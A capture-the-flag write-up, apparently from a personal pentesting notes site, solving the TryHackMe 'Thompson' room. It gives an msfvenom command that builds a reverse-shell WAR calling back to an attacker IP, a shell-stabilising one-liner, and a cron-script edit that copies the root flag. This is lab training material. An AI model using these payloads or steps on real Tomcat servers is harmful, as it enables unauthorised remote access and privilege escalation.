📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Exploitation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

Thompson

PreviousSourceNextLibrary

Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.196.112

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,8009,8080

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112

Enumeration

Lets visit the site on port 8080

Its a Apache Tomcat page, there is a Manager App tab, lets click it and see what it says

We need a username and a password, we do not have one, so lets click cancel, once we do , we get this page.

We have a username and a password, lets use these credentials to login

We are logged in. Looking through application manager, we see something interesting

We can upload WAR files, now we can make a war file payload that will give us a reverse shell on the machine.

Exploitation

Lets first make the payload, make sure to replace my IP with yours

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war

Lets upload the file, click on browse and select the file

And hit deploy, now you should see the file

Now lets start a netcat listener

Now click on the file and you should get a reverse shell

Lets stabilize the shell with these commands

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + z

We can read the user.txt file

We have two other files in the directory, lets look at what they contain

It looks like the id.sh file is running the id command and sending the output to the file called test.txt. Lets check the cronjobs running on this machine

Looks like it is reading the files in /home/jack, so lets transfer the root flag to this directory by adding the command in the id.sh file and then read it.

We can edit the file using nano or we can use this command

echo "cp /root/root.txt /home/jack/root.txt" >> id.sh

Once we do this, we should see the root.txt file in our directory and we can read it.